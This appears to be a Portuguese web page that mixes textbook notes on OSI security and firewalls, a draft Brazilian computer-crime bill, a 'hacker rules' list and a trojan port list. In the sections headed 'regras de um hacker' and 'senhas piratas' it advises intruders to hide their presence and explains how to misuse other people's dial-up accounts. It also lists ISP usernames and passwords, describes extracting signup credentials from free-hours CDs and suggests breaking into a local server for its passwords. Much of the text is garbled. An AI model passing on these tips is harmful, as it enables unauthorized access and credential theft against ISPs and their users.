. Controle de acesso - > Os mecanismos de controle de acesso são usados para garantir que o acesso a um recurso é limitado aos usuários devidamente autorizados. As técnicas utilizadas incluem a utilização de listas ou matrizes de controles de acesso, que associam recursos a usuários autorizados, ou passwords, capabilities e tokens associadas aos recursos, cuja posse determina os direitos de acesso do usuário que as possui.

Integridade de dados - > Os mecanismos de controle de integridade atuam em dois níveis: controle da integridade de unidade de dados isoladas e controle da integridade de uma conexão, isto é, das unidade de dados e da seqüência de unidades de dados transmitidas no contexto da conexão.
Para garantir a integridade dos dados, podem ser usadas as técnicas de detecção de modificações, normalmente associadas com a detecção de erros em bits, em blocos, ou erros de seqüência introduzidos por enlaces e redes de comunicação. Entretanto, se os cabeçalhos e fechos carregando as informações de controle não forem protegidas contra modificações, um intruso, que conheça as técnicas, pode contornar a verificação.
Portanto, para garantir a integridade é necessário manter confidenciais e íntegras as informações de controle usadas na detecção de modificações.
Para controlar modificações na seqüência de unidades de dados transmitidas em uma conexão, deve-se usar técnicas que garantam a integridade das unidades de dados (garantindo que as informações de controle não sejam corrompidas) em conjunto com informações de controle de seqüência. Esses cuidados, embora não evitem a modificação da cadeia de unidades de dados, garantem a detecção notificação dos ataques.

Controle de roteamento - > A possibilidade de controlar o roteamento, especificando rotas preferenciais (ou obrigatórias) para a transferência de dados, pode ser utilizada para garantir que os dados sejam transmitidos em rotas fisicamente seguras ou para garantir que informação sensível seja transportada em rotas cujos canais de comunicação forneçam os níveis apropriados de proteção.

Segurança física e de pessoal - > Medidas que garantam a integridade física dos recursos de um sistema são indispensáveis para garantir a segurança do sistema como um todo. Procedimentos operacionais devem ser definidos para delinear as responsabilidades do pessoal que interage com um dado sistema.
A segurança de qualquer sistema depende, em última instância, da segurança física dos seus recursos e do grau de confiança do pessoal que opera o sistema, ou seja, não adianta utilizar mecanismos sofisticados de segurança se os intrusos puderem acessar fisicamente os recursos do sistema. Por exemplo, ] não adianta usar um esquema sofisticado de autenticação para impedir acessos remotos aos arquivos em um disco, se o intruso puder ter acesso físico à máquina e roubar seu disco rígido.

Detecção e informe de eventos - > A detecção de eventos relevantes no contexto da segurança inclui a detecção de aparentes violações à segurança e deve incluir, adicionalmente, a detecção de eventos normais, como um acesso bem-sucedido ao sistema(login). Esse mecanismo necessita do apoio de uma função de gerenciamento que determina quais são os eventos que devem ser detectados. A detecção de um evento relevante do ponto de vista da segurança pode, por exemplo, provocar uma das seguintes ações: informe local ou remoto do evento, registro do evento em um arquivo ou a execução de uma ação de recuperação.

Registro de Eventos - > O registro de eventos que podem significar ameaças à segurança de um sistema constitui-se em um importante mecanismo de segurança, pois possibilita a detecção e investigação de possíveis violações da segurança de um sistema, além de tornar possível a realização de auditorias de segurança. Uma auditoria de segurança é uma revisão e exame dos registros de atividades do sistema feita com o objetivo de testar a eficácia dos mecanismos de controle do sistema para:
garantir a compatibilidade entre a política de segurança e os procedimentos operacionais, auxiliar na avaliação de danos e recomendar modificações nos mecanismos de controle, na política de segurança e nos procedimentos operacionais de um sistema, visando aumentar seu grau de proteção.
A auditoria de segurança envolve duas tarefas: o registro dos eventos relevantes no arquivo de auditoria de segurança (security audit log) e a análise das informações armazenadas nesse arquivo para geração de relatórios. Cabe esclarecer que a Segunda tarefa é uma função de gerenciamento de segurança,e não um mecanismo.O mecanismo de arquivamento de informações para auditoria de segurança deve permitir a definição de qual informação deve ser registrada, sob que condições a informação deve ser registrada, além da definição da sintaxe e semântica que devem ser usadas para representá-las.


SERVIÇOS DE SEGURANÇA OSI


São empregados nas camadas em combinações apropriadas usualmente junto com serviços e mecanismos que estão fora do escopo OSI, para satisfazer os requisitos de uma política de segurança. Veja alguns serviços de segurança OSI básicos.

Autenticação - > Trata autenticação de entidades que são parceiras em uma comunicação ou da autenticação da entidade que originou uma unidade de dados.

Controle de acesso - > O serviço de controle de acesso fornece proteção contra o uso não autorizado dos recursos cujo acesso se dê via sistema de comunicação de dados OSI.

Confidencialidade de dados - > O serviço de confidencialidade fornece proteção aos dados intercambiados no ambiente OSI contra revelação não autorizada da informação neles transportada.

Integridade de dados - > O serviço de integridade de dados, atua no sentido de proteger os dados intercambiados no ambiente OSI contra ataques ativos que implicam na modificação, remoção ou injeção não autorizada de unidade de dados. Esse serviço também é fornecido em diferentes níveis: em uma conexão com ou sem a opção de recuperação da informação original, em unidades de dados isoladas com e sem recuperação e em campos selecionados nas unidades de dados trocadas em serviços com ou sem conexão.

Ipedimento de rejeição - > O serviço de impedimento de rejeição atua impedindo a rejeição de serviços, através da prova da identidade das entidades que solicitam a execução de serviços, ou da prova que uma entidade de destino recebeu corretamente uma solicitação para realização de determinado serviço.


SEGURANÇA NA INTERNET TCP/IP

O termo arquitetura de segurança de uma rede pode ser empregado com conotações diferentes. Para a Isso, uma arquitetura de segurança consiste na definição de conceitos e terminologia que formam um esquema básico para o desenvolvimento de protocolos. No caso da Internet, espera-se que a arquitetura de segurança forneça um conjunto de orientações mais concreto, voltado para projetistas de redes e desenvolvedores de produtos, e não apenas para projetistas de protocolos. Isso sugere que a arquitetura de segurança da Internet englobe não apenas definições de conceitos, como faz o padrão ISO, mas inclua adicionalmente orientações mais específicas sobre como e onde implementar os serviços de segurança na pilha de protocolos da Internet. Esta visão alinha-se com a filosofia da Internet que enfatiza a interoperabilidade entre sistemas, produzindo padrões que tendem a ser menos genéricos que os do ISO.

Definição dos serviços, mecanismos e ameaças - > Tudo indica que a segurança da Internet adotará a definição de serviços, mecanismos e ameaças do padrão ISO. Cabe entretanto destacar que a adoção da terminologia usada não implica na adoção dos mapeamentos dos serviços nas camadas e dos mecanismos nos serviços, propostos nesse padrão.
Além dos princípios de segurança OSI, serão considerados adicionalmente princípios orientados para a escolha de mecanismos. Alguns desses princípios são.
· Os mecanismos de segurança devem ser escaláveis, tendo capacidade e potencial para acompanhar o crescimento da comunidade Internet.
· Os mecanismos devem Ter sua segurança apoiada na tecnologia que os suporta, por exemplo, em algoritmos e protocolos que sejam seguros, isto é, que não possuam falhas intrínsecas.
· Os mecanismos de segurança não devem restringir a topologia da rede.
· Mecanismos de segurança que não sejam sujeitos às restrições de controle de exportação ou patentes devem ter preferência.
· É sabido que muitos mecanismos de segurança necessitam de uma infra-estrutura de apoio, o gerenciamento dessa infra-estrutura pode ser tão ou mais complexo que a implementação do mecanismo. Assim, deve-se dar preferência a tecnologias de segurança que possam compartilhar uma infra-estrutura de segurança comum.
· Algoritmos de criptografia selecionados para padronização na Internet devem ser amplamente conhecidos, devendo ser dada preferência aos que tiverem sido exaustivamente testados.


Mapeamento dos mecanismos nos serviçose dos serviços nas camadas da arquitetura internet - > O mapeamento dos mecanismos nos serviços de segurança proposto pela ISO também deverá ser usado como ponto de partida para o mapeamento na arquitetura de segurança da Internet, embora, no ambiente Internet, a lista de mecanismos deva ser mais específica, fornecendo orientações mais concretas aos projetistas de protocolos.


Relacionamento das aplicações internet com os serviços e mecanismos de segurança - > O mapeamento dos serviços nas camadas é o núcleo da arquitetura de segurança OSI, onde o mapeamento dos mecanismos nos serviços tem um papel secundário, apresentando, assim, um caráter mais informativo do que normativo. O Privacy and Security Research Group (PSGR) da Internet Research Task Force achou por bem incorporar à arquitetura Internet um mapeamento adicional,
que enfoca aplicações específicas da rede, usualmente definidas como um protocolo ou uma classe de protocolos. Para cada aplicação, são caracterizadas os requisitos de segurança e uma tecnologia de segurança específica. Por exemplo, um conjunto de protocolos e uma infra-estrutura de suporte, são identificados como apropriados para fornecer os serviços de segurança requisitados. Esse mapeamento é um refinamento e uma composição dos mapeamentos
entre camadase serviços e entre mecanismos e serviços OSI, capturando a essência da arquitetura de segurança da Internet.
O mapeamento entre mecanismos de segurança e aplicações, em alguns casos, baseia-se no exame de um protocolo de aplicação específico, porém, na maior parte dos caso, baseia-se nos requisitos percebidos em qualquer protocolo que fornece um determinado serviço de rede. Em alguns casos protocolos específicos podem ser citados como apropriados para fornecer o mecanismo de segurança necessário. Em outros, é identificado um vazio em termos de funcionalidade


Correio eletrônico - > Os serviços de segurança necessários para o correio eletrônico na Internet deverão incluir confidencialidade e integridade em transmissões sem conexão, autenticação das mensagens, e impedimento da rejeição pelo destinatário ou remetente.

Serviço de diretórios - > Existem dois modelos de serviços de diretórios que podem ser usados na Internet: o Domain Name System - DNS e o X.500. Os requisitos de Serviços de segurança são bem definidos para o X.500, que incorpora em seu protocolo mecanismos de segurança para implementar esses serviços. Por outro lado, não existe uma definição explícita dos serviços de segurança para o DNS, que, consequentemente, não possui mecanismos de segurança.
Provavelmente, se o DNS for aumentado para incorporar recursos de segurança, seus requisitos de segurança serão muito semelhantes aos do X.500. São esses requisitos: autenticação da origem dos dados,
controle de integridade em transmissões sem conexão para proteger as consultas e respostas ao diretório, controle de acesso para permitir o armazenamento dos dados no diretório com a confiança que esses dados só serão modificados por usuários autorizados, ou administradores, e que dados sensíveis não serão revelados para usuários não autorizados. Espera-se que, no ambiente Internet, as políticas de controle de acesso baseadas na identidade dos usuários sejam mais relevantes que as baseadas em verificação de rótulos. Todos esses serviços são fornecidos pelo X.500 através de mecanismos implementados no protocolo de aplicação. Além desses serviços,
em alguns casos pode ser necessário garantir a confidencialidade dos dados no diretório. Esse último serviço pode ser fornecido nos níveis de rede ou transporte.

Gerenciamento de redes - >,/font> O protocolo de gerenciamento de redes na Internet é o SNMP. Melhoramentos recentes no SNMP, SNMP Versão 2, provêem suporte a um conjunto de requisitos de segurança. Os serviços de segurança que passaram a ser fornecidos foram: confidencialidade e integridade (com proteção contra reenvio postergado - replay) na transmissão de datagramas, autenticação da origem de dados e controle de acesso baseado na identidade. Esses serviços são empregados na proteção contra violações de intercâmbio de informações de gerenciamento, e para proteger os objetos gerenciados contra tentativas de manipulação não autorizada.


Servidores de arquivos - > Servidores de arquivos são implementados por sistemas com o NFS da Sun e o Andrew File System, e distinguem-se dos protocolos para transferência de arquivos por fornecer um conjunto de serviços mais rico, que inclui o acesso randônico a partes de um arquivo. Os requisitos de segurança nesses sistemas incluem : a integridade e a confidencialidade no intercâmbio de datagramas, a autenticação de parceiros, e o controle de acesso (baseado em identidade). Alguns desses serviços(confidencialidade e integridade) podem ser fornecidos por protocolos do nível de rede e de transporte. Entretanto, a granularidade necessária para o controle de acesso, por exemplo, a nível de arquivo ou diretório, é obviamente mais fina do que a que pode ser fornecida nos níveis da rede e de transporte. Como até o momento não foram definidos padrões para protocolos de segurança que suportam essa aplicação, ainda não há recomendação para os servidores de arquivos na arquitetura de segurança da Internet.

Roteamento - > O roteamento na Internet é realizado por protocolos como o BGP, EGP e OSPF. Todos esses tipos de protocolos possuem requisitos de segurança semelhantes: autenticação de parceiros e integridade no intercâmbio de datagramas carregando informações de roteamento. Caso seja preciso proteger as informações sobre a topologia das redes, é necessário garantir a confidencialidade dos datagramas.
A maior parte desses serviço pode ser fornecida com a utilização de mecanismos genéricos da camada de rede, ou podem ser construídos especificamente para os protocolos de roteamento. Nesse caso, a granularidade da autenticação e do controle de acesso é claramente atingida pelas informações de identificação fornecidas nessa camada.
A variedade dos protocolos de roteamento torna óbvio os benefícios de se utilizar mecanismos de segurança comuns fornecidos na camada de rede.
O serviço de confidencialidade do fluxo de tráfego ponto a ponto pode ser fornecido aos usuários pelo roteador, utilizando mecanismos do nível físico. Porém, para garantir confidencialidade quando os pacotes atravessam vários roteadores em seu caminho, é necessário usar o serviço de confidencialidade no nível de rede.

Barreiras de proteção - FireWalls - > Um mecanismo muito usado na prática para aumentar a segurança de redes ligadas à Internet é o firewall, que é uma espécie de barreira de proteção.
A utilização de barreiras de proteção fundamenta-se no fato de que normalmente a segurança é inversamente proporcional a complexidade. Assim, proteger máquinas de uso geral onde são executados diferentes aplicações, de variados portes , é uma tarefa complicada,
pois é muito improvável que nenhuma das várias aplicações apresente falhas que possam ser exploradas para violar a segurança do sistema. Assim fica muito mais fácil garantir a segurança isolando as máquinas de uso geral de acessos externos, usando uma barreira de proteção, ou firewalls, que impeça a exploração das possíveis falhas. O princípio da simplicidade tem como conseqüência a seguinte consideração: para diminuir os riscos, a configuração dos firewalls deve ser minimizada, excluindo tudo que não seja estritamente necessário.
Um firewall é definido [Cheswick 94] como uma coleção de componentes, colocada entre duas redes, que coletivamente possua as seguintes propriedades:


· Todo tráfego de dentro para fora da rede, e vice versa, passa pelo firewall.

· Só o tráfego autorizado pela política de segurança pode atravessar o firewall .

· O firewall deve ser à prova de violações.

Um firewall pode ser visto como um monitor de referências para uma rede, sendo seu objetivo garantir a integridade dos recursos ligados a ela.
A centralização demanda uma administração mais cuidadosa por parte dos administradores do sistema da(s) máquina(s) que implementa(m) o firewall. Enquanto as máquinas de uso geral são configuradas para otimizar o desempenho e a facilidade de utilização, no firewall tudo isso passa para o segundo plano, cedendo lugar ao seu objetivo principal no sistema: a segurança. Um firewall, em geral, consiste nos componentes mostrados na figura abaixo.
Os filtros (screens) bloqueiam a transmissão de certas classes de tráfego. O componente gateway é uma máquina, ou um conjunto de máquinas conectadas por um segmento de rede, que fornecem serviços de retransmissão . O filtro colocado na saída (entre a rede externa e o gateway) é usado para proteger o gateway de ataques externos, enquanto o filtro interno protege a rede interna das conseqüências de um ataque que tenha conseguido comprometer o funcionamento o funcionamento do gateway. Assim, os dois filtros atuando isoladamente, ou em conjunto, protegem a rede interna de ataques externos. Um gateway do firewall que pode ser acessado a partir da rede externa é chamado de bastion host. Cabe reafirmar que, fisicamente, os filtros e o gateway podem ser implementados em uma única máquina, ou em um conjunto de máquinas ligadas por um segmento de rede.

Os firewalls são classificados em três categorias principais: Filtros de pacotes, Gateways de circuitos e Gateways de aplicação.

· Filtros de pacote - > Utilizam endereços IP de origem e de destino, e portas UDP e TCP para tomar decisões de controle de acesso. O administrador elabora uma lista de máquinas e serviços que estão autorizados a transmitir datagramas nos possíveis sentidos de transmissão(entrando na rede interna, saindo da rede interna ou ambos), que é então usada para filtrar os datagramas IP que tentam atravessar o firewall. Um exemplo de política de filtragem de pacotes seria: permitir o tráfego de datagramas carregando mensagens de SMTP e DNS nas duas direções, tráfego Telnet só para pacotes saindo da rede interna e impedir todos os outros tipos de tráfego.

· Gateways de circuito -> Atua como intermediário de conexões TCP, funcionando como um proxy TCP (um TPC modificado). Para transmitir dados através do firewall, o usuário origem conecta-se a uma porta TCP no gateway, que por sua vez, conecta-se, usando outra conexão TCP, ao usuário destino. Um circuito é formado por uma conexão TCP na rede interna e outra na rede externa, associadas pelo gateway de circuito. O processo que implementa esse tipo de gateway atua repassando bytes de conexão para outra, fechando o circuito. Para que seja estabelecido um circuito, o usuário de origem deve fazer uma solicitação ao gateway no firewall, passando como parâmetros a máquina e o serviço de destino. O gateway então estabelece o circuito ou, em caso contrário, retorna um código informando o motivo do não estabelecimento. Note que é necessário que o usuário de origem utilize um protocolo simples para comunicar-se com o gateway, esse protocolo é um bom local para implementar, por exemplo, um mecanismo de autenticação.

· Gateways de aplicação - > Utilizam implementações especiais das aplicações, desenvolvidas especificamente para funcionar de forma segura. Devido a grande flexibilidade dessa abordagem, ela é a que pode fornecer o maior grau de proteção. Por exemplo, um gateway FTP pode ser programado para restringir as operações de transferência a arquivos fisicamente localizados no bastion host. Assim, os usuários externos só podem ter acesso aos arquivos disponibilizados nessa máquina (um bastion host).

CURIOSIDADE
Quando a Intel (maior fabricante de microprocessadores do mundo) anunciou como ia ser o seu novo chip, muita gente ficou de cabelo em pé. Pentium III viria com um código inviolável que identificaria máquina e dono. A empresa achou que ia abafar. Afinal, se alguém roubasse o micro, daria para saber pela Internet onde ele foi parar - quem vai querer um Pentium III e ficar desplugado ? O chip aumentaria ainda a segurança do comércio eletrônico, funcionando como um RG. Só que logo percebeu-se que isso acabaria com a privacidade na rede, pois todo micro poderia ser devassado pela Intel. Houve uma gritaria e a empresa teve de voltar atrás. Resultado: o tal código será opcional. www.pentiumiii.com

leis digitais

CAPÍTULO 1

Dos princípios que regulam a prestação de serviço por redes de computadores.

Artigo Primeiro- O acesso, o processamento e a disseminação de informações através das redes de computadores devem estar a serviço do cidadão e da sociedade, respeitados os critérios de garantia dos direitos individuais e coletivos e de privacidade e segurança de pessoas físicas e jurídicas e da garantia de acesso às informações disseminadas pelos serviços de rede.

Artigo Segundo- É livre a estruturação e o funcionamento das redes de computadores e seus serviços, ressalvadas disposições específicas reguladas em lei.


CAPÍTULO 2

Do uso de informações disponíveis em computadores ou redes de computadores.

Artigo Terceiro- Para fins desta lei, entende-se por informações privadas aquelas relativas à pessoa física ou jurídica identificada ou identificável.

Parágrafo Único - É identificável a pessoa cuja individualização não envolva custos ou prazos desproporcionados.

Artigo Quarto- Ninguém será obrigado a fornecer informações sobre sua pessoa ou de terceiros, salvo nos casos previstos em lei.

Artigo Quinto- A coleta, o processamento e a distribuição, com finalidades comerciais, de informações privadas ficam sujeitas à prévia aquiescência da pessoa a que se referem, que poderá ser tornada sem efeito a qualquer momento, ressalvando-se o pagamento de indenizações a terceiros, quando couberem.

§1. A toda pessoa cadastrada dar-se-á conhecimento das informações privadas armazenadas e das retrospectivas fontes.

§ 2. Fica assegurado o direito à retificação de qualquer informação privada incorreta.

§ 3. Salvo a disposição legal ou determinação judicial em contrário, nenhuma informação privada será mantida à revelia da pessoa a que se refere ou além do tempo previsto para a sua vaidade.

§ 4. Qualquer pessoa, física ou jurídica, tem o direito de interpelar o proprietário de rede de computadores ou o provedor de serviço para saber se mantém as informações a seu respeito, e o respectivo teor.

Artigo Sexto- Os serviços de informações ou de acesso a bancos de dados não distribuirão informações privadas referentes, direta ou indiretamente, a origem racial, opinião pública, filosófica, religiosa ou de orientação sexual, e de filiação a qualquer entidade, pública ou privada, salvo autorização expressa do interessado.

Artigo Sétimo- O acesso de terceiros, não autorizados pelos respectivos interessados, à informações privadas mantidas em redes de computadores dependerá de prévia autorização judicial.


CAPÍTULO 3

Dos crimes de informática.

Seção I ¼ Dano a dado ou programa de computador.

Artigo Oitavo- Apagar, destruir, modificar ou de qualquer forma inutilizar, total ou parcialmente, dado ou programa de computador, de forma indevida ou não autorizada.

PENA: detenção, de um a três anos e multa.

Parágrafo único = Se o crime é cometido:

I ¼ contra o interesse da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos;

II ¼ com considerável prejuízo da vítima;

III- com intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro;

IP ¼ com abuso de confiança;

P ¼ por motivo fútil;

PI - com o uso indevido de senha ou processo de identificação de terceiro; ou

PII ¼ com a utilização de qualquer outro meio fraudulento.

PENA: detenção, de dois a quatro anos e multa.

Seção II ¼ Acesso indevido ou não autorizado

Artigo Nono- Obter acesso, indevido ou não autorizado, a computador ou rede de computadores.

PENA: detenção, de seis meses a um ano e multa.

Parágrafo Primeiro: Na mesma pena incorre quem, sem autorização ou indevidamente, obtém, mantém ou fornece a terceiro qualquer meio de identificação ou acesso a computador ou rede de computadores.

Parágrafo Segundo - Se o crime é cometido;

I ¼ com acesso a computador ou rede de computadores da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos;

II ¼ com o considerável prejuízo para a vítima;

III ¼ com o intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro;

I - com abuso de confiança;

P ¼ por motivo fútil;

PI ¼ com o uso indevido de senha ou processo de identificação de terceiro; ou

PII ¼ com a utilização de qualquer outro meio fraudulento.

PENA: detenção, de um a dois anos e multa.

Seção III ¼ Alteração de senha ou mecanismo de acesso a programa de computador ou dados.

Artigo Décimo- Apagar, destruir, alterar, ou de qualquer forma inutilizar, senha ou qualquer outro mecanismo de acesso a computador, programa de computador ou dados, de forma indevida ou não autorizada.

PENA: detenção, de um a dois anos e multa.

Seção IP - Obtenção indevida ou não autorizada de dado ou instrução de computador.

Artigo Décimo Primeiro- Obter, manter ou fornecer, sem autorização ou indevidamente, dado ou instrução de computador.

PENA: detenção, de três meses a um ano e multa.

Parágrafo Único - Se o crime é cometido:

I ¼ com acesso a computador ou rede de computadores da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos;

II ¼ com considerável prejuízo para a vítima;

III ¼ com o intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro;

IP ¼ com abuso de confiança;

P ¼ por motivo fútil;

PI ¼ com o uso indevido de senha ou processo de identificação de terceiro; ou

PII ¼ com a utilização de qualquer outro meio fraudulento.

PENA: detenção, de um a dois anos e multa.

Seção P ¼ Piolação de segredo armazenado em computador, meio magnético, de natureza magnética, óptica ou similar

Artigo Décimo Segundo- Obter segredos, de industria, ou comércio, ou informações pessoais armazenadas em computador, rede de computadores, meio eletrônico de natureza magnética, óptica ou similar, de forma indevida ou não autorizada.

PENA: detenção, de um a três anos e multa.

Seção PI ¼ Criação, desenvolvimento ou inserção em computador de dados ou programa de computador com fins nocivos

Artigo Décimo terceiro- Criar, desenvolver ou inserir, dado ou programa em computador ou rede de computadores, de forma indevida ou não autorizada, com a finalidade de apagar, destruir, inutilizar ou modificar dado ou programa de computador ou de rede de computadores, dificultar ou impossibilitar, total ou parcialmente, a utilização de computador ou rede de computadores.

PENA: reclusão, de um a três anos e multa.

Parágrafo Único - Se o crime é cometido:

I ¼ contra o interesse da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos;

II ¼ com considerável prejuízo para a vítima;

III ¼ com o intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro;

IP ¼ com abuso de confiança;

P ¼ por motivo fútil;

PI ¼ com o uso indevido de senha ou processo de identificação de terceiro; ou

PII ¼ com a utilização de qualquer outro meio fraudulento.

PENA: reclusão, de dois a seis anos e multa.

Seção PII - Peiculação de pornografia através de rede de computadores.

Artigo Décimo Quarto- Oferecer serviço ou informação de caráter pornográfico, em rede de computadores, sem exibir, previamente, de forma facilmente visível e destacada, aviso sobre a natureza, indicando o seu conteúdo e a inadequação para a criança ou adolescentes.

PENA: detenção, de um a três anos e multa.


CAPÍTULO 4

Das disposições finais.

Artigo Décimo Quinto- Se qualquer dos crimes previstos nesta lei é praticado no exercício de atividade profissional ou funcional, a pena é aumentada de um sexto até a metade.

Artigo Décimo Sexto- Nos crimes definidos nesta lei somente se procede mediante representação do ofendido, salvo se cometidos contra o interesse da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta, empresa concessionária de serviços públicos, fundações instituídas ou mantidas pelo poder público, serviços sociais autônomos, instituições financeiras ou empresas que explorem ramo de atividade controlada pelo poder público, casos em que a ação é pública incondicionada.

Artigo Décimo Sétimo- Esta lei regula os crimes relativos à informática sem prejuízo das demais cominações previstas em outros diplomas legais.

Artigo Décimo Oitavo- Esta lei entra em vigor 30 (trinta) dias a contar da data de sua publicação.



ALGUNS CRIMES DIGITAIS

Ação: Enviar mensagem alarmante, como a da existência de um novo vírus, e recomendar a retransmissão do arquivo para o maior número de pessoas possível, causando sobrecargas em sistemas como o do ICQ.

Pena: detenção de 3 meses a 1 ano ou multa (correspondente ao art.146; constrangimento ilegal)

Ação: Enviar e-mail com ameaça de agressão.

Pena: detenção de 1 a 6 meses ou multa (correspondente ao art.147; ameaça)

Ação: Abrir e-mail alheio sem autorização.

Pena: detenção de 1 a 6 meses ou multa (correspondente ao art.151; violação de correspondência)

Ação: Invadir um computador e apagar os dados ou enviar um vírus pela Internet

Pena: detenção de 1 a 6 meses ou multa (correspondente ao art.163; dano)

Ação: Fazer compras na rede com números falsos de cartão de crédito ou outro

documento.

Pena: reclusão de 1 a 5 meses ou multa (correspondente ao art.171; estelionato)

Ação: Colocar fotos de sexo explícito ou pedofilia em uma home page.

Pena: detenção de 6 meses a 2 anos ou multa (correspondente ao art.234; escrito ou objeto obsceno)

Ação: Montar sites com receitas de bombas, ensinamentos de como destruir carros e fazer ligações de celulares sem pagar.

Pena: detenção de 3 meses a 6 meses ou multa (correspondente ao art.286; incitação ao crime)

regras de um hacker

01- Nunca destrua nenhum sistema.

02- Nunca altere nenhum dos arquivos do sistema, a não ser que seja necessário para esconder a sua presença ou garantir a sua entrada posteriormente.

03- Não compartilhe com ninguém seus projetos hackers.

04- Em uma BBS, não é aconselhável que você discuta seus projetos hackers. BBS podem ser monitoradas pelo governo.

05- Nunca dê nomes ou telefones reais em uma BBS.

06- Nunca deixe seu apelido em um sistema que você entrou.

07- NÃO entre em computadores governamentais.

08- Nunca converse sobre seus planos hackers com outra pessoa do telefone de sua casa.

09- Seja atento. Mantenha todo o seu material hacker em um lugar seguro.

10- Para se tornar um verdadeiro hacker você deve simplesmente praticar

senhas piratas

1 - Tente não conectar-se entre 9:00 e 22:00.
,MXCM


2 - Nunca, mas nunca, use mais de 2 horas por dia, mesmo assim é muito, o melhor é tentar descobrir se a senha que você esta usando é "full", se for, se deu de bem, geralmente o "usuario" nem liga para seu saldo de horas gastas, mas não exagere.

3 - Tenha mais de uma senha de acesso, no mínimo 3, para caso de algo errado com uma das senhas você tem mais 2 para poder ir correndo atrás de mais senhas e ficar mais calmo.

4 - Se você perceber que esta "caindo" muito, não entre mais nesse dia que você caiu, entre só no outro dia, se o "usuário normal" estiver conectado também, geralmente, um dos dois que usam a mesma senha vão cair, toda hora um caí e se ele cair de mais ele pode desconfiar e acabar trocando a senha e babal pra você.

5 - Seja discreto, não vai chegar numa sala de Chat se achando o maior e ficar falando para todo mundo que esta usando um senha pirata.

6 - Use a cabeça.

Agora vamos as mais esperadas, você tava loco pra chegar aqui, num tava? É isso, "EU QUERO É VER O LOKO"

Servidor Fone Usuário Senha Estado
Uninet (061) 327 2882 ieak unisys96 DF
Mandic (011) 870 0100 ppp novo São Paulo
IBM (011) 887 9001 São Paulo
UOL 0800 15 8002 universo online (Brasil)

Essas são senhas de inscrição, se você ainda não sabe nem pegar senhas de inscrição, vai aprender agora, é só pensar um pouco, vamos lá:
Você já deve ter comprado uma dessas revista de Informática, algumas delas geralmente vem com um Cd de horas grátis de internet, aí você já deve ter executado o programa, ele pede para instalar a merda do Internet Explorer e mais monte de coisa, aí no final, geralmente, reinicia o computador aí é executado altomaticamente o Internet Explorer, ELE VAI DISCAR PARA UM LOCAL PARA PODER FAZER SUA INSCRIÇÃO... e esse local é um servidor de internet... já sabe até o que fazer né não?

Para você conseguir achar os dados da inscrição, você tem que saber em qual arquivo tá guardado os dados sobre a mesma, use um editor Hexadecimal, ou use o Edit do MS-DOS. Visualize arquivo por arquivos do diretório onde fica a Instalação das horas grátis, procure por numeros de telefone, quando você achar você vai acabar vendo alguma coisa por perto haver com "senha", bom aí tá sua senha de inscrição, e o usuário também deve tá por perto, mas para melhorar sua vida, geralmente, esses dados (telefone, usuário e senha) ficam num arquivo chamado "signup.???", é signup alguma coisa, eu esqueci a extensão, mas não há muito arquivo com esse nome. Visualize ele, até pelo Notepad mesmo, gostou? muito bom né nao? Dentro dele vem tudo dividido certinho, tudo prontinho pra usar... bom, você intendeu né? se não intendeu leia denovo!

Quase sempre essas senhas só deixam ficar conectadas por um certo tempo, depois o servidor desconectão você, o tempo de conexão é mais ou menos uns 15 minutos, é o tempo que você usa pra fazer a inscrição, mas se você for inteligente e criativo, com esses 15 minutos você pode tentar invadir um servidor da sua cidade e pegar as senhas dele, mas cuidado em, não exagere...

lista de portas

Esta lista é útil para aquelas pessoas que estão infectadas com algum trojan e não sabem qual seu nome, bastando apenas saber em qual porta ele está agindo.

Abaixo está a lista das portas-padrão utilizadas pelos trojans mais conhecidos para Windows NT, 95, 98:

Porta 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
Porta 23 - Tiny Telnet Server
Porta 25 - Antigen, Email Password Sender, Haebu Coceda, Terminator, S
htrilitz Stealth, WinPC, WinSpy
Porta 31 - Hackers Paradise, Master's Paradise 8
Porta 121 - BO jammerkillahV
Porta 456 - Hackers Paradise
Porta 555 - Ini-Killer, Phase Zero, Stealth Spy
Porta 666 - Satanz Backdoor, Attack FTP
Porta 1001 - Silencer, WebEx
Porta 1011 - Doly Trojan
Porta 1033 - NetSpy
Porta 1080 - Wingate (Socks-Proxy)
Porta 1170 - Psyber Stream Server, Voice, Streaming Audio Trojan
Porta 1234 - Ultors Trojan
Porta 1243 - SubSeven
Porta 1245 - VooDoo Doll
Porta 1492 - FTP99CMP
Porta 1509 - Psyber Streaming Server
Porta 1600 - Shivka-Burka
Porta 1807 - SpySender
Porta 1981 - Shockrave
Porta 1999 - BackDoor
Porta 2001 - Trojan Cow
Porta 2023 - Ripper
Porta 2115 - Bugs
Porta 2140 - Deep Throat, The Invasor
Porta 2565 - Striker
Porta 2583 - WinCrash 2.0
Porta 2801 - Phineas Phucker
Porta 3024 - WinCrash
Porta 3129 - Masters Paradise
Porta 3150 - Deep Throat, The Invasor
Porta 3700 - Portal of Doom
Porta 4590 - ICQTrojan
Porta 4950 - IcqTrojen
Porta 5000 - Sockets de Troie
Porta 5001 - Sockets de Troie
Porta 5321 - Firehotcker
Porta 5400 - Blade Runner
Porta 5401 - Blade Runner
Porta 5402 - Blade Runner
Porta 5569 - Robo-Hack
Porta 5742 - WinCrash
Porta 6400 - The tHing
Porta 6670 - DeepThroat
Porta 6771 - DeepThroat
Porta 6883 - DeltaSource
Porta 6939 - Indoctrination
Porta 6969 - GateCrasher, Priority
Porta 7000 - Remote Grab
Porta 7300 - NetMonitor
Porta 7301 - NetMonitor
Porta 7306 - NetMonitor
Porta 7307 - NetMonitor
Porta 7308 - NetMonitor
Porta 7789 - ICKiller
Porta 9872 - Portal of Doom
Porta 9873 - Portal of Doom
Porta 9874 - Portal of Doom
Porta 9875 - Portal of Doom
Porta 9989 - iNi-Killer
Porta 10067 - Portal of Doom
Porta 10167 - Portal of Doom
Porta 11000 - Senna Spy
Porta 11223 - Progenic trojan
Porta 12223 - Hack´99 KeyLogger
